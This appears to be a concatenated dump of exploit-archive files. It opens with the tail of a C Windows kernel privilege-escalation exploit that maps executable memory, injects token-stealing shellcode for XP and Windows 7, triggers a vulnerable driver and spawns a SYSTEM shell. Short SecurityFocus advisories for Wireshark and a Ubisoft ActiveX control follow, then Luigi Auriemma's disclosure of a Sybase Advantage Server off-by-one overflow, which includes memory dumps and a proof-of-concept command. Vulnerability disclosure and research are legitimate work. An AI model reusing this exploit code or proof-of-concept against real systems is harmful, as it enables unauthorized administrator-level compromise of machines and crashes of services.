allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
else if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 7\n");
memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[~] Press any key to Exploit . . .\n");
getch();
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48389/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
Wireshark 1.4.5 is vulnerable.
http://www.exploit-db.com/sploits/35873.pcap

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48462/info
Ubisoft CoGSManager ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.
Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable.
http://www.exploit-db.com/sploits/35885.zip

View file

@ -0,0 +1,155 @@
source: http://www.securityfocus.com/bid/48464/info
Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability.
Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/35886.zip
#######################################################################
Luigi Auriemma
Application: Sybase Advantage Server
http://www.sybase.com/products/databasemanagement/advantagedatabaseserver
Versions: <= 10.0.0.3
Platforms: Windows, NetWare, Linux
Bug: off-by-one
Exploitation: remote, versus server
Date: 27 Jun 2011 (found 29 Oct 2010)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"Advantage Database Server is a full-featured, easily embedded,
client-server, relational database management system that provides you
with Indexed Sequential Access Method (ISAM) table-based and SQL-based
data access."
#######################################################################
======
2) Bug
======
By default the Advantage server (ADS process) listens on the UDP and
TCP ports 6262 and optionally is possible to specify also a so called
"internet port" for non-LAN connections.
The problem is enough unusual and affects the code that handles a
certain type of packets on the UDP port.
In short the server does the following:
- it uses memcpy to copy the data from the packet into a stack buffer
of exactly 0x2b8 bytes (handled as 0x2b9 bytes)
- later this data is handled as a string but no final NULL byte
delimiter is inserted
- there is also an off-by-one bug since one byte overwrites the lower
8bit value of a saved element (a stack pointer 017bff??)
- after this buffer are located some pushed elements and obviously the
return address of the function
- it calls the OemToChar API that changes some bytes of the buffer
(like those major than 0x7f) till it reaches a 0x00 that "luckily" is
after the return address
- so also the return address gets modified, exactly from 0084cb18 to
00e42d18 that ironically is a valid stack frame somewhat related to
the starting of the service
- the data inside this stack address doesn't seems changeable from
outside and has tons of 0x00 bytes that in this case act like NOPs
till the zone around 00ebf05b where are located some pushed elements
- the EBX register contains two bytes of the attacker's data and EBP
points to such data
the following is a resume of these operations:
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 FF 7B aaaaaaaaaaaaaa?{
017BF67B 01 99 26 C1 71 BC F6 7B 01 18 CB 84 00 00 00 00 .?&?q??{..?....
|---------|
original return address
0084B81D |. FF15 DC929000 CALL DWORD PTR DS:[<&USER32.OemToCharA>]
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 A0 7B aaaaaaaaaaaaaa?{
017BF67B 01 D6 26 2D 71 2B F7 7B 01 18 2D E4 00 00 00 00 .?&-q+?{..-?....
|---------|
new return address
00E42D18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00E42D28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
...
00EBF04B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00EBF05B 00 99 78 82 7C 4A EC 82 7C 20 00 00 00 A0 F0 EB .?x?|J??| ...???
00EBF06B 00 A0 F0 EB 00 00 00 00 00 68 F1 EB 00 01 00 00 .???.....h??....
00EBF07B 00 5C F1 EB 00 D1 0F E7 77 A0 F0 EB 00 00 00 00 .\??.?.?w???....
00EBF08B 00 51 02 02 00 EC 0F E7 77 00 D0 FD 7F 00 00 00 .Q...?.?w.??...
00EBF09B 00 01 00 00 00 18 00 34 00 02 00 00 00 7C 0A 00 .......4.....|..
00EBF0AB 00 14 0D 00 00 1C 75 17 00 00 00 00 00 00 00 00 ......u.........
00EBF0BB 00 51 02 02 00 08 00 00 C0 00 00 00 00 00 00 00 .Q......?.......
the code flow usually arrives till 00ebf0ab or other addresses close
to it depending by the data saved there when the service started.
Now for exploiting this vulnerability would be required the presence of
a "jmp ebp" or "call ebp" or a sequence of instructions with a similar
result in the 00ebf05b zone which looks like an enough rare event.
I have not tested the Linux and NetWare platforms so I don't know if
the problem exists also there and if there are more chances of
exploiting it.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/ads_crc.zip
udpsz -C 0012 -L ads_crc.dll -b 0x61 SERVER 6262 0x592
#######################################################################
======
4) Fix
======
No fix.
UPDATE:
vendor has fixed the bug in version 10.10.0.16 released in July 2011:
http://devzone.advantagedatabase.com/dz/content.aspx?key=44&id=ef0915fb-44c2-fe4b-ac26-9ed3359cffff
#######################################################################